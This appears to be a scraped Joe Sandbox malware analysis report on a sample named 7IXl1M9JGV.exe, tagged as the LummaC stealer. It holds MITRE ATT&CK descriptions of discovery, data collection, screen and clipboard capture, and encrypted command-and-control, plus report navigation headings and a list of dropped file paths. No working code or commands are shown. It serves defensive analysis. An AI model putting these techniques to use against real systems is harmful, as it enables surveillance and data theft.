Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 7IXl1M9JGV.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\RES267D.tmp

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mmr3gpqi.uqi.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pb1fzgt2.3ek.psm1

C:\Users\user\AppData\Local\Temp\qh4rltex\CSCE36AEDAA1DED41D2AE2F4E1F8F6B418.TMP

C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.0.cs

Windows Analysis Report
7IXl1M9JGV.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre